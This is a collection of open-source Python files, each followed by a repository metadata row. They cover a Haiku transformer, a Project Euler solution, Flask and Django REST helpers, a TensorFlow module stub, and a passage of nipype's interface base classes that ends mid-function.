  """Multi-head self attention with a causal (lower-triangular) mask."""
  def __call__(
      self,
      query: jnp.ndarray,
      key: Optional[jnp.ndarray] = None,
      value: Optional[jnp.ndarray] = None,
      mask: Optional[jnp.ndarray] = None,
  ) -> jnp.ndarray:
    # Self attention: key/value default to the query tensor.
    if key is None:
      key = query
    if value is None:
      value = query
    if query.ndim != 3:
      raise ValueError('Expect queries of shape [B, T, D].')
    seq_len = query.shape[1]
    # Lower-triangular [T, T] matrix forbids attending to the future.
    causal_mask = np.tril(np.ones((seq_len, seq_len)))
    if mask is None:
      mask = causal_mask
    else:
      mask = mask * causal_mask
    return super().__call__(query, key, value, mask)
class DenseBlock(hk.Module):
  """Position-wise MLP: widen by a factor, apply gelu, project back."""
  def __init__(self,
               init_scale: float,
               widening_factor: int = 4,
               name: Optional[str] = None):
    super().__init__(name=name)
    self._init_scale = init_scale
    self._widening_factor = widening_factor
  def __call__(self, x: jnp.ndarray) -> jnp.ndarray:
    size = x.shape[-1]
    w_init = hk.initializers.VarianceScaling(self._init_scale)
    hidden = hk.Linear(self._widening_factor * size, w_init=w_init)(x)
    hidden = jax.nn.gelu(hidden)
    # Narrow back to the input width.
    return hk.Linear(size, w_init=w_init)(hidden)
class Transformer(hk.Module):
  """A transformer stack."""
  def __init__(self,
               num_heads: int,
               num_layers: int,
               dropout_rate: float,
               name: Optional[str] = None):
    super().__init__(name=name)
    self._num_layers = num_layers
    self._num_heads = num_heads
    self._dropout_rate = dropout_rate
  def __call__(self,
               h: jnp.ndarray,
               mask: Optional[jnp.ndarray],
               is_training: bool) -> jnp.ndarray:
    """Connects the transformer.
    Args:
      h: Inputs, [B, T, D].
      mask: Padding mask, [B, T].
      is_training: Whether we're training or not.
    Returns:
      Array of shape [B, T, D].
    """
    init_scale = 2. / self._num_layers
    # Dropout is disabled at evaluation time.
    dropout_rate = self._dropout_rate if is_training else 0.
    if mask is not None:
      # Add head and query axes: [B, T] -> [B, 1, 1, T].
      mask = mask[:, None, None, :]
    # Note: names chosen to approximately match those used in the GPT-2 code;
    # see https://github.com/openai/gpt-2/blob/master/src/model.py.
    # Pre-norm residual blocks: LayerNorm -> attention -> residual add,
    # then LayerNorm -> MLP -> residual add.  The order of the
    # hk.next_rng_key() calls is part of the model's determinism; do not
    # reorder these statements.
    for i in range(self._num_layers):
      h_norm = layer_norm(h, name=f'h{i}_ln_1')
      h_attn = CausalSelfAttention(
          num_heads=self._num_heads,
          key_size=32,
          model_size=h.shape[-1],
          w_init_scale=init_scale,
          name=f'h{i}_attn')(h_norm, mask=mask)
      h_attn = hk.dropout(hk.next_rng_key(), dropout_rate, h_attn)
      h = h + h_attn
      h_norm = layer_norm(h, name=f'h{i}_ln_2')
      h_dense = DenseBlock(init_scale, name=f'h{i}_mlp')(h_norm)
      h_dense = hk.dropout(hk.next_rng_key(), dropout_rate, h_dense)
      h = h + h_dense
    # Final LayerNorm over the stack output.
    h = layer_norm(h, name='ln_f')
    return h
def layer_norm(x: jnp.ndarray, name: Optional[str] = None) -> jnp.ndarray:
  """Apply a uniquely-named LayerNorm (scale + offset) over the last axis."""
  normalizer = hk.LayerNorm(
      axis=-1, create_scale=True, create_offset=True, name=name)
  return normalizer(x)
| deepmind/dm-haiku | examples/transformer/model.py | Python | apache-2.0 | 4,120 |
"""Problem 45 of https://projecteuler.net"""
from projecteuler.generators import triangle_numbers
from projecteuler.inspectors import is_pentagonal, is_hexagonal
def problem_45():
    """Solution to problem 45.

    Returns the third number that is simultaneously triangular,
    pentagonal and hexagonal.
    """
    matches = 0
    for candidate in triangle_numbers():
        if is_hexagonal(candidate) and is_pentagonal(candidate):
            matches += 1
            if matches == 3:
                return candidate
| hjheath/ProjectEuler | projecteuler/problems/problem_45.py | Python | mit | 518 |
# Single-source version string for the yatsm package.
__version__ = '0.7.0'
| ceholden/yatsm | yatsm/version.py | Python | mit | 22 |
import os
from flask import session
from everyclass.server.utils.web_consts import SESSION_CURRENT_USER, SESSION_USER_SEQ
def plugin_available(plugin_name: str) -> bool:
    """
    Check whether a plugin (Sentry, apm, logstash) is enabled for the
    current run mode.

    :return: True if available else False
    """
    # Imported lazily to avoid a circular import at module load time.
    from everyclass.server.utils.config import get_config
    config = get_config()
    mode = os.environ.get("MODE", None)
    if not mode:
        raise EnvironmentError("MODE not in environment variables")
    # e.g. plugin "sentry" -> config attribute SENTRY_AVAILABLE_IN
    allowed_modes = getattr(config, "{}_AVAILABLE_IN".format(plugin_name).upper())
    return mode.lower() in allowed_modes
# User-type tags returned by get_ut_uid() below.
UTYPE_USER = "user"    # logged-in user (identified by student number)
UTYPE_GUEST = "guest"  # anonymous visitor (identified by session user seq)
def get_ut_uid():
    """Return a (user_type, uid) tuple for the current session.

    Logged-in users yield their student number; anonymous visitors
    yield the user sequence id stored in the session.
    """
    result = None
    if SESSION_CURRENT_USER in session:
        result = (UTYPE_USER, session[SESSION_CURRENT_USER].identifier)
    elif SESSION_USER_SEQ in session:
        result = (UTYPE_GUEST, session[SESSION_USER_SEQ])
    if result is None:
        raise NotImplementedError("user seq not exist in session")
    return result
def get_logged_in_uid():
    """Return the uid of the currently logged-in user, or None if the
    visitor is not logged in."""
    user_type, uid = get_ut_uid()
    return None if user_type == UTYPE_GUEST else uid
| fr0der1c/EveryClass-server | everyclass/server/utils/common_helpers.py | Python | mpl-2.0 | 1,226 |
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login
from rest_framework.serializers import (
ModelSerializer,
HyperlinkedIdentityField,
SerializerMethodField,
)
from photos.models import *
class UserSerializer(ModelSerializer):
    """Serializer for Django auth users; the password is write-only."""
    class Meta:
        model = User
        fields = [
            'id',
            'username',
            'password',
            'email',
            'first_name',
            'last_name',
        ]
        extra_kwargs = {'password': {'write_only': True}}
    def create(self, validated_data):
        """Create a user, hashing the raw password via set_password."""
        # NOTE(review): first_name/last_name from validated_data are not
        # persisted here -- confirm that is intended.
        new_user = User(
            username=validated_data.get('username'),
            email=validated_data.get('email'),
        )
        new_user.set_password(validated_data.get('password'))
        new_user.save()
        return new_user
class FolderSerializer(ModelSerializer):
    """Serializer for folders, embedding their photos as a read-only list."""
    photos = SerializerMethodField()
    class Meta:
        model = Folder
        fields = [
            'id',
            'name',
            'user',
            'photos',
            'date_created',
            'date_modified',
        ]
        extra_kwargs = {'date_created': {'read_only': True},
                        'date_modified': {'read_only': True}}
    def get_photos(self, obj):
        """Return the serialized photos contained in this folder."""
        return [PhotoSerializer(photo).data for photo in obj.photo_set.all()]
class PhotoSerializer(ModelSerializer):
    """Serializer for photos, adding the folder name and uploader username."""
    folder_name = SerializerMethodField()
    uploader = SerializerMethodField()
    class Meta:
        model = Photo
        fields = [
            'id',
            'image',
            'title',
            'edited_image',
            'folder_name',
            'share_code',
            'effects',
            'uploader',
            'file_size',
            'user',
            'date_created',
            'date_modified',
        ]
        extra_kwargs = {'date_created': {'read_only': True},
                        'date_modified': {'read_only': True}}
    def get_folder_name(self, obj):
        """Return the containing folder's name, or 'None' when unfiled.

        The previous bare ``except:`` swallowed every exception
        (including KeyboardInterrupt); the only expected failure is
        ``obj.folder`` being None, which raises AttributeError.
        """
        try:
            return obj.folder.name
        except AttributeError:
            return 'None'
    def get_uploader(self, obj):
        """Return the username of the photo's owner."""
        return obj.user.username
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras' Distribution Strategy library."""
# pylint: disable=unused-import
from tensorflow.python.keras.distribute import sidecar_evaluator
| tensorflow/tensorflow | tensorflow/python/keras/distribute/__init__.py | Python | apache-2.0 | 831 |
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Package contains interfaces for using existing functionality in other packages
Exaples FSL, matlab/SPM , afni
Requires Packages to be installed
"""
from ConfigParser import NoOptionError
from copy import deepcopy
from cPickle import dumps
import datetime
import errno
import json
import os
import re
import platform
import pwd
from socket import getfqdn
from string import Template
import select
import subprocess
import sys
from textwrap import wrap
from datetime import datetime as dt
from dateutil.parser import parse as parseutc
from warnings import warn
from uuid import uuid1
from distutils.version import LooseVersion
try:
import prov.model as pm
except ImportError:
from ..external import provcopy as pm
from .traits_extension import (traits, Undefined, TraitDictObject,
TraitListObject, TraitError,
isdefined, File, Directory,
has_metadata)
from ..utils.filemanip import (md5, hash_infile, FileNotFoundError,
hash_timestamp, save_json,
split_filename)
from ..utils.misc import is_container, trim, str2bool
from .. import config, logging
from .. import __version__
nipype_version = LooseVersion(__version__)
from .. import get_info
iflogger = logging.getLogger('interface')
__docformat__ = 'restructuredtext'
def load_template(name):
    """Load a template from the script_templates directory

    Parameters
    ----------
    name : str
        The name of the file to load

    Returns
    -------
    template : string.Template
    """
    full_fname = os.path.join(os.path.dirname(__file__),
                              'script_templates', name)
    # Use a context manager so the handle is closed even if read() fails
    # (the previous open/read/close sequence leaked on error).
    with open(full_fname) as template_file:
        template = Template(template_file.read())
    return template
class Bunch(object):
    """Dictionary-like class that provides attribute-style access to its items.
    A `Bunch` is a simple container that stores its items as class
    attributes. Internally all items are stored in a dictionary and
    the class exposes several of the dictionary methods.
    Examples
    --------
    >>> from nipype.interfaces.base import Bunch
    >>> inputs = Bunch(infile='subj.nii', fwhm=6.0, register_to_mean=True)
    >>> inputs
    Bunch(fwhm=6.0, infile='subj.nii', register_to_mean=True)
    >>> inputs.register_to_mean = False
    >>> inputs
    Bunch(fwhm=6.0, infile='subj.nii', register_to_mean=False)
    Notes
    -----
    The Bunch pattern came from the Python Cookbook:
    .. [1] A. Martelli, D. Hudgeon, "Collecting a Bunch of Named
           Items", Python Cookbook, 2nd Ed, Chapter 4.18, 2005.
    """
    def __init__(self, *args, **kwargs):
        # All state lives in __dict__, so attribute access == item access.
        self.__dict__.update(*args, **kwargs)
    def update(self, *args, **kwargs):
        """update existing attribute, or create new attribute
        Note: update is very much like HasTraits.set"""
        self.__dict__.update(*args, **kwargs)
    def items(self):
        """iterates over bunch attributes as key, value pairs"""
        return self.__dict__.items()
    def iteritems(self):
        """iterates over bunch attributes as key, value pairs"""
        warn('iteritems is deprecated, use items instead')
        return self.items()
    def get(self, *args):
        '''Support dictionary get() functionality
        '''
        return self.__dict__.get(*args)
    def set(self, **kwargs):
        '''Support dictionary update() functionality
        '''
        return self.__dict__.update(**kwargs)
    def dictcopy(self):
        """returns a deep copy of existing Bunch as a dictionary"""
        return deepcopy(self.__dict__)
    def __repr__(self):
        """representation of the sorted Bunch as a string
        Currently, this string representation of the `inputs` Bunch of
        interfaces is hashed to determine if the process' dirty-bit
        needs setting or not. Till that mechanism changes, only alter
        this after careful consideration.
        """
        outstr = ['Bunch(']
        first = True
        for k, v in sorted(self.items()):
            if not first:
                outstr.append(', ')
            outstr.append('%s=%r' % (k, v))
            first = False
        outstr.append(')')
        return ''.join(outstr)
    def _hash_infile(self, adict, key):
        # Inject file hashes into adict[key]
        stuff = adict[key]
        if not is_container(stuff):
            stuff = [stuff]
        file_list = []
        for afile in stuff:
            if os.path.isfile(afile):
                md5obj = md5()
                # NOTE(review): 'file' is the Python 2 builtin open; this
                # method breaks on Python 3 -- confirm py2-only support.
                fp = file(afile, 'rb')
                while True:
                    # hash the file in 8 KiB chunks to bound memory use
                    data = fp.read(8192)
                    if not data:
                        break
                    md5obj.update(data)
                fp.close()
                md5hex = md5obj.hexdigest()
            else:
                # non-existent paths get a None hash
                md5hex = None
            file_list.append((afile, md5hex))
        return file_list
    def _get_bunch_hash(self):
        """Return a dictionary of our items with hashes for each file.
        Searches through dictionary items and if an item is a file, it
        calculates the md5 hash of the file contents and stores the
        file name and hash value as the new key value.
        However, the overall bunch hash is calculated only on the hash
        value of a file. The path and name of the file are not used in
        the overall hash calculation.
        Returns
        -------
        dict_withhash : dict
            Copy of our dictionary with the new file hashes included
            with each file.
        hashvalue : str
            The md5 hash value of the `dict_withhash`
        """
        infile_list = []
        for key, val in self.items():
            if is_container(val):
                # XXX - SG this probably doesn't catch numpy arrays
                # containing embedded file names either.
                if isinstance(val, dict):
                    # XXX - SG should traverse dicts, but ignoring for now
                    item = None
                else:
                    if len(val) == 0:
                        raise AttributeError('%s attribute is empty' % key)
                    item = val[0]
            else:
                item = val
            try:
                if os.path.isfile(item):
                    infile_list.append(key)
            except TypeError:
                # `item` is not a file or string.
                continue
        dict_withhash = self.dictcopy()
        dict_nofilename = self.dictcopy()
        for item in infile_list:
            dict_withhash[item] = self._hash_infile(dict_withhash, item)
            dict_nofilename[item] = [val[1] for val in dict_withhash[item]]
        # Sort the items of the dictionary, before hashing the string
        # representation so we get a predictable order of the
        # dictionary.
        sorted_dict = str(sorted(dict_nofilename.items()))
        return (dict_withhash, md5(sorted_dict).hexdigest())
    def __pretty__(self, p, cycle):
        '''Support for the pretty module
        pretty is included in ipython.externals for ipython > 0.10'''
        if cycle:
            p.text('Bunch(...)')
        else:
            p.begin_group(6, 'Bunch(')
            first = True
            for k, v in sorted(self.items()):
                if not first:
                    p.text(',')
                    p.breakable()
                p.text(k + '=')
                p.pretty(v)
                first = False
            p.end_group(6, ')')
class InterfaceResult(object):
    """Container for the results of running a particular Interface.

    Attributes
    ----------
    version : version of this Interface result object (a readonly property)
    interface : class type
        A copy of the `Interface` class that was run to generate this result.
    inputs : a traits free representation of the inputs
    outputs : Bunch
        An `Interface` specific Bunch that contains all possible files
        that are generated by the interface. The `outputs` are used
        as the `inputs` to another node when interfaces are used in
        the pipeline.
    runtime : Bunch
        Contains attributes that describe the runtime environment when
        the `Interface` was run. Contains the attributes:
        * cmdline : The command line string that was executed
        * cwd : The directory the ``cmdline`` was executed in.
        * stdout : The output of running the ``cmdline``.
        * stderr : Any error messages output from running ``cmdline``.
        * returncode : The code returned from running the ``cmdline``.
    """
    def __init__(self, interface, runtime, inputs=None, outputs=None,
                 provenance=None):
        # bump _version whenever the attribute layout changes
        self._version = 2.0
        self.provenance = provenance
        self.outputs = outputs
        self.inputs = inputs
        self.runtime = runtime
        self.interface = interface
    @property
    def version(self):
        """Read-only layout version of this result object."""
        return self._version
class BaseTraitedSpec(traits.HasTraits):
    """Provide a few methods necessary to support nipype interface api
    The inputs attribute of interfaces call certain methods that are not
    available in traits.HasTraits. These are provided here.
    new metadata:
    * usedefault : set this to True if the default value of the trait should be
      used. Unless this is set, the attributes are set to traits.Undefined
    new attribute:
    * get_hashval : returns a tuple containing the state of the trait as a dict
      and hashvalue corresponding to dict.
    XXX Reconsider this in the long run, but it seems like the best
    solution to move forward on the refactoring.
    """
    def __init__(self, **kwargs):
        """ Initialize handlers and inputs"""
        # NOTE: In python 2.6, object.__init__ no longer accepts input
        # arguments. HasTraits does not define an __init__ and
        # therefore these args were being ignored.
        #super(TraitedSpec, self).__init__(*args, **kwargs)
        super(BaseTraitedSpec, self).__init__(**kwargs)
        # make trait assignment errors raise instead of being swallowed
        traits.push_exception_handler(reraise_exceptions=True)
        undefined_traits = {}
        for trait in self.copyable_trait_names():
            if not self.traits()[trait].usedefault:
                undefined_traits[trait] = Undefined
        self.trait_set(trait_change_notify=False, **undefined_traits)
        self._generate_handlers()
        self.set(**kwargs)
    def items(self):
        """ Name, trait generator for user modifiable traits
        """
        for name in sorted(self.copyable_trait_names()):
            yield name, self.traits()[name]
    def __repr__(self):
        """ Return a well-formatted representation of the traits """
        outstr = []
        for name, value in sorted(self.trait_get().items()):
            outstr.append('%s = %s' % (name, value))
        return '\n' + '\n'.join(outstr) + '\n'
    def _generate_handlers(self):
        """Find all traits with the 'xor' metadata and attach an event
        handler to them.
        """
        # traits carrying 'xor', 'requires' or 'deprecated' metadata get
        # a change-notification callback wired up here
        has_xor = dict(xor=lambda t: t is not None)
        xors = self.trait_names(**has_xor)
        for elem in xors:
            self.on_trait_change(self._xor_warn, elem)
        has_requires = dict(requires=lambda t: t is not None)
        requires = self.trait_names(**has_requires)
        for elem in requires:
            self.on_trait_change(self._requires_warn, elem)
        has_deprecation = dict(deprecated=lambda t: t is not None)
        deprecated = self.trait_names(**has_deprecation)
        for elem in deprecated:
            self.on_trait_change(self._deprecated_warn, elem)
    def _xor_warn(self, obj, name, old, new):
        """ Generates warnings for xor traits
        """
        if isdefined(new):
            trait_spec = self.traits()[name]
            # for each xor, set to default_value
            for trait_name in trait_spec.xor:
                if trait_name == name:
                    # skip ourself
                    continue
                if isdefined(getattr(self, trait_name)):
                    # undo the assignment before raising, so the spec is
                    # left in a consistent state
                    self.trait_set(trait_change_notify=False,
                                   **{'%s' % name: Undefined})
                    msg = ('Input "%s" is mutually exclusive with input "%s", '
                           'which is already set') % (name, trait_name)
                    raise IOError(msg)
    def _requires_warn(self, obj, name, old, new):
        """Part of the xor behavior
        """
        if isdefined(new):
            trait_spec = self.traits()[name]
            msg = None
            for trait_name in trait_spec.requires:
                if not isdefined(getattr(self, trait_name)):
                    if not msg:
                        msg = 'Input %s requires inputs: %s' \
                            % (name, ', '.join(trait_spec.requires))
            if msg:
                warn(msg)
    def _deprecated_warn(self, obj, name, old, new):
        """Checks if a user assigns a value to a deprecated trait
        """
        if isdefined(new):
            trait_spec = self.traits()[name]
            msg1 = ('Input %s in interface %s is deprecated.' %
                    (name,
                     self.__class__.__name__.split('InputSpec')[0]))
            msg2 = ('Will be removed or raise an error as of release %s'
                    % trait_spec.deprecated)
            if trait_spec.new_name:
                if trait_spec.new_name not in self.copyable_trait_names():
                    raise TraitError(msg1 + ' Replacement trait %s not found' %
                                     trait_spec.new_name)
                msg3 = 'It has been replaced by %s.' % trait_spec.new_name
            else:
                msg3 = ''
            msg = ' '.join((msg1, msg2, msg3))
            # hard error once the deprecation release is older than the
            # running nipype version; otherwise just warn
            if LooseVersion(str(trait_spec.deprecated)) < nipype_version:
                raise TraitError(msg)
            else:
                warn(msg)
                if trait_spec.new_name:
                    # transparently forward the value to the new trait
                    warn('Unsetting %s and setting %s.' % (name,
                                                           trait_spec.new_name))
                    self.trait_set(trait_change_notify=False,
                                   **{'%s' % name: Undefined,
                                      '%s' % trait_spec.new_name: new})
    def _hash_infile(self, adict, key):
        """ Inject file hashes into adict[key]"""
        stuff = adict[key]
        if not is_container(stuff):
            stuff = [stuff]
        file_list = []
        for afile in stuff:
            if is_container(afile):
                # nested container: recurse and keep only the hashes
                hashlist = self._hash_infile({'infiles': afile}, 'infiles')
                hash = [val[1] for val in hashlist]
            else:
                if config.get('execution',
                              'hash_method').lower() == 'timestamp':
                    hash = hash_timestamp(afile)
                elif config.get('execution',
                                'hash_method').lower() == 'content':
                    hash = hash_infile(afile)
                else:
                    raise Exception("Unknown hash method: %s" %
                                    config.get('execution', 'hash_method'))
            file_list.append((afile, hash))
        return file_list
    def get(self, **kwargs):
        """ Returns traited class as a dict
        Augments the trait get function to return a dictionary without
        notification handles
        """
        out = super(BaseTraitedSpec, self).get(**kwargs)
        out = self._clean_container(out, Undefined)
        return out
    def get_traitsfree(self, **kwargs):
        """ Returns traited class as a dict
        Augments the trait get function to return a dictionary without
        any traits. The dictionary does not contain any attributes that
        were Undefined
        """
        out = super(BaseTraitedSpec, self).get(**kwargs)
        out = self._clean_container(out, skipundefined=True)
        return out
    def _clean_container(self, object, undefinedval=None, skipundefined=False):
        """Convert a traited obejct into a pure python representation.
        """
        # NOTE(review): parameter name 'object' shadows the builtin; kept
        # as-is to avoid touching code in a documentation pass.
        if isinstance(object, TraitDictObject) or isinstance(object, dict):
            out = {}
            for key, val in object.items():
                if isdefined(val):
                    out[key] = self._clean_container(val, undefinedval)
                else:
                    if not skipundefined:
                        out[key] = undefinedval
        elif (isinstance(object, TraitListObject) or isinstance(object, list)
              or isinstance(object, tuple)):
            out = []
            for val in object:
                if isdefined(val):
                    out.append(self._clean_container(val, undefinedval))
                else:
                    if not skipundefined:
                        out.append(undefinedval)
                    else:
                        out.append(None)
            if isinstance(object, tuple):
                out = tuple(out)
        else:
            if isdefined(object):
                out = object
            else:
                if not skipundefined:
                    out = undefinedval
        return out
    def get_hashval(self, hash_method=None):
        """Return a dictionary of our items with hashes for each file.
        Searches through dictionary items and if an item is a file, it
        calculates the md5 hash of the file contents and stores the
        file name and hash value as the new key value.
        However, the overall bunch hash is calculated only on the hash
        value of a file. The path and name of the file are not used in
        the overall hash calculation.
        Returns
        -------
        dict_withhash : dict
            Copy of our dictionary with the new file hashes included
            with each file.
        hashvalue : str
            The md5 hash value of the traited spec
        """
        dict_withhash = {}
        dict_nofilename = {}
        for name, val in sorted(self.get().items()):
            if isdefined(val):
                trait = self.trait(name)
                # traits tagged nohash=True never participate in hashing
                if has_metadata(trait.trait_type, "nohash", True):
                    continue
                hash_files = (not has_metadata(trait.trait_type, "hash_files",
                                               False)
                              and not has_metadata(trait.trait_type,
                                                   "name_source"))
                dict_nofilename[name] = \
                    self._get_sorteddict(val, hash_method=hash_method,
                                         hash_files=hash_files)
                dict_withhash[name] = \
                    self._get_sorteddict(val, True, hash_method=hash_method,
                                         hash_files=hash_files)
        return (dict_withhash, md5(str(dict_nofilename)).hexdigest())
    def _get_sorteddict(self, object, dictwithhash=False, hash_method=None,
                        hash_files=True):
        # Recursively normalize a value for hashing: dicts are sorted by
        # key, files are replaced by (path, hash) or just the hash, and
        # floats are stringified with fixed precision.
        if isinstance(object, dict):
            out = {}
            for key, val in sorted(object.items()):
                if isdefined(val):
                    out[key] = \
                        self._get_sorteddict(val, dictwithhash,
                                             hash_method=hash_method,
                                             hash_files=hash_files)
        elif isinstance(object, (list, tuple)):
            out = []
            for val in object:
                if isdefined(val):
                    out.append(self._get_sorteddict(val, dictwithhash,
                                                    hash_method=hash_method,
                                                    hash_files=hash_files))
            if isinstance(object, tuple):
                out = tuple(out)
        else:
            if isdefined(object):
                if (hash_files and isinstance(object, str) and
                        os.path.isfile(object)):
                    if hash_method is None:
                        hash_method = config.get('execution', 'hash_method')
                    if hash_method.lower() == 'timestamp':
                        hash = hash_timestamp(object)
                    elif hash_method.lower() == 'content':
                        hash = hash_infile(object)
                    else:
                        raise Exception("Unknown hash method: %s" % hash_method)
                    if dictwithhash:
                        out = (object, hash)
                    else:
                        out = hash
                elif isinstance(object, float):
                    # fixed 10-decimal formatting keeps float hashing stable
                    out = '%.10f' % object
                else:
                    out = object
        return out
class DynamicTraitedSpec(BaseTraitedSpec):
    """ A subclass to handle dynamic traits
    This class is a workaround for add_traits and clone_traits not
    functioning well together.
    """
    def __deepcopy__(self, memo):
        """ bug in deepcopy for HasTraits results in weird cloning behavior for
        added traits
        """
        id_self = id(self)
        # honor the deepcopy memo so shared references stay shared
        if id_self in memo:
            return memo[id_self]
        dup_dict = deepcopy(self.get(), memo)
        # access all keys
        for key in self.copyable_trait_names():
            _ = getattr(self, key)
        # clone once
        dup = self.clone_traits(memo=memo)
        for key in self.copyable_trait_names():
            try:
                _ = getattr(dup, key)
            except:
                pass
        # clone twice
        # NOTE(review): the double clone (with attribute touches between)
        # is a deliberate workaround for the traits cloning bug mentioned
        # above -- do not "simplify" to a single clone.
        dup = self.clone_traits(memo=memo)
        dup.set(**dup_dict)
        return dup
class TraitedSpec(BaseTraitedSpec):
    """ Create a subclass with strict traits.
    This is used in 90% of the cases.
    """
    # Disallow assignment to any trait name not explicitly declared on
    # the subclass (catches typos in input names at assignment time).
    _ = traits.Disallow
class Interface(object):
    """This is an abstract definition for Interface objects.
    It provides no functionality. It defines the necessary attributes
    and methods all Interface objects should have.
    """
    # Subclasses assign traited spec classes to these two attributes.
    input_spec = None # A traited input specification
    output_spec = None # A traited output specification
    _can_resume = False # defines if the interface can reuse partial results
    # after interruption
    @property
    def can_resume(self):
        # read-only view of _can_resume
        return self._can_resume
    _always_run = False # should the interface be always run even if the
    # inputs were not changed?
    @property
    def always_run(self):
        # read-only view of _always_run
        return self._always_run
    def __init__(self, **inputs):
        """Initialize command with given args and inputs."""
        raise NotImplementedError
    @classmethod
    def help(cls):
        """ Prints class help"""
        raise NotImplementedError
    @classmethod
    def _inputs_help(cls):
        """ Prints inputs help"""
        raise NotImplementedError
    @classmethod
    def _outputs_help(cls):
        """ Prints outputs help"""
        raise NotImplementedError
    @classmethod
    def _outputs(cls):
        """ Initializes outputs"""
        raise NotImplementedError
    @property
    def version(self):
        # version of the wrapped tool; must be supplied by subclasses
        raise NotImplementedError
    def run(self):
        """Execute the command."""
        raise NotImplementedError
    def aggregate_outputs(self, runtime=None, needed_outputs=None):
        """Called to populate outputs"""
        raise NotImplementedError
    def _list_outputs(self):
        """ List expected outputs"""
        raise NotImplementedError
    def _get_filecopy_info(self):
        """ Provides information about file inputs to copy or link to cwd.
        Necessary for pipeline operation
        """
        raise NotImplementedError
def safe_encode(x):
    """Encodes a python value for prov

    Maps None/str/int/float to typed PROV literals, dict/list to
    JSON-serialized string literals, and anything else to a pickled
    literal (falling back to a fixed string when pickling fails).
    """
    nipype = pm.Namespace("nipype", "http://nipy.org/nipype/terms/")
    if x is None:
        return pm.Literal("Unknown", pm.XSD['string'])
    if isinstance(x, (str, unicode)):
        if os.path.exists(x):
            # existing paths become file:// URIs on this host
            try:
                return pm.URIRef('file://%s%s' % (getfqdn(), x))
            except AttributeError:
                return pm.Literal('file://%s%s' % (getfqdn(), x),
                                  pm.XSD['anyURI'])
        else:
            return pm.Literal(x, pm.XSD['string'])
    if isinstance(x, (int,)):
        return pm.Literal(int(x), pm.XSD['integer'])
    if isinstance(x, (float,)):
        return pm.Literal(x, pm.XSD['float'])
    if isinstance(x, dict):
        # nested PROV literals are reduced to their JSON representation
        # before the container is serialized
        outdict = {}
        for key, value in x.items():
            encoded_value = safe_encode(value)
            if isinstance(encoded_value, (pm.Literal,)):
                outdict[key] = encoded_value.json_representation()
            else:
                outdict[key] = encoded_value
        return pm.Literal(json.dumps(outdict), pm.XSD['string'])
    if isinstance(x, list):
        outlist = []
        for value in x:
            encoded_value = safe_encode(value)
            if isinstance(encoded_value, (pm.Literal,)):
                outlist.append(encoded_value.json_representation())
            else:
                outlist.append(encoded_value)
        return pm.Literal(json.dumps(outlist), pm.XSD['string'])
    try:
        # last resort: pickle the value under the nipype:pickle type
        return pm.Literal(dumps(x), nipype['pickle'])
    except TypeError, e:
        iflogger.info(e)
        return pm.Literal("Could not encode", pm.XSD['string'])
class BaseInterfaceInputSpec(TraitedSpec):
    """Inputs common to every BaseInterface."""
    # When True, a failing _run_interface logs the error instead of
    # raising; excluded from the input hash (nohash=True).
    ignore_exception = traits.Bool(False, desc="Print an error message instead \
of throwing an exception in case the interface fails to run", usedefault=True,
                                   nohash=True)
class BaseInterface(Interface):
    """Implements common interface functionality.

    Implements
    ----------

    * Initializes inputs/outputs from input_spec/output_spec
    * Provides help based on input_spec and output_spec
    * Checks for mandatory inputs before running an interface
    * Runs an interface and returns results
    * Determines which inputs should be copied or linked to cwd

    This class does not implement aggregate_outputs, input_spec or
    output_spec. These should be defined by derived classes.

    This class cannot be instantiated.
    """
    input_spec = BaseInterfaceInputSpec
    # cached tool version; read lazily through the `version` property
    _version = None
def __init__(self, **inputs):
    """Instantiate the input spec and seed it with ``inputs``.

    Raises
    ------
    Exception
        If the subclass did not define ``input_spec``.
    """
    if not self.input_spec:
        raise Exception('No input_spec in class: %s' %
                        self.__class__.__name__)
    self.inputs = self.input_spec(**inputs)
@classmethod
def help(cls, returnhelp=False):
    """ Prints class help

    Assembles the class docstring plus the generated inputs/outputs
    sections; returns the text instead of printing when ``returnhelp``
    is True.
    """
    if cls.__doc__:
        docstring = trim(cls.__doc__).split('\n') + ['']
    else:
        docstring = ['']
    allhelp = '\n'.join(docstring + cls._inputs_help() + [''] +
                        cls._outputs_help() + [''])
    if returnhelp:
        return allhelp
    else:
        print(allhelp)
@classmethod
def _get_trait_desc(self, inputs, name, spec):
    """Build the tab-indented help lines for a single trait.

    NOTE(review): declared as a classmethod but the first parameter is
    named ``self``; it actually receives the class.
    """
    desc = spec.desc
    xor = spec.xor
    requires = spec.requires
    manhelpstr = ['\t%s' % name]
    try:
        # deliberately assign an invalid value so traits reports the
        # expected type in the raised TraitError
        setattr(inputs, name, None)
    except TraitError as excp:
        def_val = ''
        if getattr(spec, 'usedefault'):
            def_arg = getattr(spec, 'default_value')()[1]
            def_val = ', nipype default value: %s' % str(def_arg)
        line = "(%s%s)" % (excp.info, def_val)
        manhelpstr = wrap(line, 70,
                          initial_indent=manhelpstr[0]+': ',
                          subsequent_indent='\t\t ')
    if desc:
        for line in desc.split('\n'):
            line = re.sub("\s+", " ", line)
            manhelpstr += wrap(line, 70,
                               initial_indent='\t\t',
                               subsequent_indent='\t\t')
    if xor:
        line = '%s' % ', '.join(xor)
        manhelpstr += wrap(line, 70,
                           initial_indent='\t\tmutually_exclusive: ',
                           subsequent_indent='\t\t ')
    if requires:
        # list the other members of the requires group
        others = [field for field in requires if field != name]
        line = '%s' % ', '.join(others)
        manhelpstr += wrap(line, 70,
                           initial_indent='\t\trequires: ',
                           subsequent_indent='\t\t ')
    return manhelpstr
@classmethod
def _inputs_help(cls):
    """ Prints description for input parameters

    Splits the traits into [Mandatory] and [Optional] sections.
    """
    helpstr = ['Inputs::']
    inputs = cls.input_spec()
    # no non-transient traits at all -> short-circuit with "None"
    if len(inputs.traits(transient=None).items()) == 0:
        helpstr += ['', '\tNone']
        return helpstr
    manhelpstr = ['', '\t[Mandatory]']
    for name, spec in sorted(inputs.traits(mandatory=True).items()):
        manhelpstr += cls._get_trait_desc(inputs, name, spec)
